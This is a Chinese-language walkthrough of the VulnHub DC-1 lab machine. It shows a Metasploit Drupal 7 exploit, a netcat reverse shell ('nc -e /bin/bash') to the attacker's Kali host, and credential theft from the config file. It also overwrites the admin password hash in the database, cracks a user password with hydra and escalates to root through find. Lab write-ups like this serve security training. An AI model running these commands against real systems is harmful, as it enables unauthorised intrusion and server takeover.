實(shí)驗(yàn)環(huán)境準(zhǔn)備:
kali:172.25.0.69 dc-1: MAC地址:00:0C:29:51:DB:CC
dc-1靶機(jī)下載地址:https://www.vulnhub.com/entry/dc-1,292/
0x01 端口掃描
根據(jù)MAC地址查找靶機(jī)IP地址,得到靶機(jī)IP地址為172.25.0.55
netdiscover -i eth0 -r 172.25.0.0/24 //netdiscover是一個(gè)主動(dòng)/被動(dòng)的 ARP偵查工具,通過(guò)抓取網(wǎng)絡(luò)中的arp廣播包來(lái)確定網(wǎng)絡(luò)中存活的IP
命令詳解 -i 指定網(wǎng)卡 -r 指定掃描的網(wǎng)段
使用namp工具對(duì)靶機(jī)進(jìn)行端口掃描
nmap -A -p- 172.25.0.55 //全端口掃描生產(chǎn)環(huán)境基本上用-sS參數(shù)來(lái)進(jìn)行隱蔽掃描
由端口掃描發(fā)現(xiàn)該主機(jī)dc1-80端口開(kāi)放呼股,由此斷定dc1有基于drupal7CMS對(duì)外發(fā)布的網(wǎng)站業(yè)務(wù)
另一種查看CMS版本方法:ctrl+u 瀏覽器模式下查看網(wǎng)頁(yè)源碼
發(fā)現(xiàn)該網(wǎng)站是基于Drupal7版本的cms搭建
0x02 漏洞利用
利用msf進(jìn)行網(wǎng)站滲透
search drupal //查看drupal cms 存在的漏洞
use 4 //為什么使用這個(gè)exp灾前,具體情況大家具體分析
info 查看當(dāng)前exp可利用的版本味抖,發(fā)現(xiàn)drupal7版本可以進(jìn)行利用
在msf控制界面運(yùn)行以下命令
set RHOSTS 172.25.0.55
set VHOST 172.25.0.69
exploit
成功拿到該網(wǎng)站服務(wù)器的webshell權(quán)限
輸入shell命令進(jìn)入shell命令行模式
利用python一句話命令進(jìn)入交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
0x03 提權(quán)
發(fā)現(xiàn)dc1存在nc工具且具有-e選項(xiàng)
通過(guò)nc反彈shell到kali
命令如下
nc -lvvp 1234 //kali開(kāi)啟1234端口的監(jiān)聽(tīng)
nc -e /bin/bash 172.25.0.69 1234 //dc1通過(guò)nc連接kali的1234端口
發(fā)現(xiàn)flag1
根據(jù)flag1提示找到flag2 //可能有人會(huì)問(wèn)為什么配置文件是這個(gè)我又是怎么找到的烤低,百度drupal7配置文件存放路徑
同時(shí)發(fā)現(xiàn)數(shù)據(jù)庫(kù)的用戶名和密碼 'username' => 'dbuser', 'password' => 'R0ck3t',
由于flag提示我們可以避免使用暴力破解的方法來(lái)破解密碼
我們通過(guò)更新數(shù)據(jù)庫(kù)密碼來(lái)更改后臺(tái)管理員的密碼為admin
php scripts/password-hash.sh admin #生成密碼為 admin的密文
mysql -udbuser -pR0ck3t
use drupaldb;
update users set pass='$S$DhbcpLhyAcXB8jKvGBqS9hbWWSOIACm1nQpvwZt7ZGjK3WFC2stw' where name="admin"
通過(guò)后臺(tái)管理員賬號(hào)登陸網(wǎng)站拿到flag3
用戶名:admin 密碼:admin
cat /etc/passwd 查看passwd文件發(fā)現(xiàn)存在可登錄shell賬號(hào)flag4
使用hydra進(jìn)行密碼破解 得到flag4用戶密碼為orange
以flag4身份ssh登陸dc1刑顺,在家目錄下找到flag4
查看可以以root身份運(yùn)行的命令
此處我們利用find命令來(lái)進(jìn)行l(wèi)inux提權(quán) //提權(quán)方法有很多種大家可以發(fā)散自己的思維
并且在拿到最后一個(gè)flag 在/root目錄下柔纵,同時(shí)提權(quán)成功拿到該網(wǎng)站服務(wù)器的最高權(quán)限缔杉。
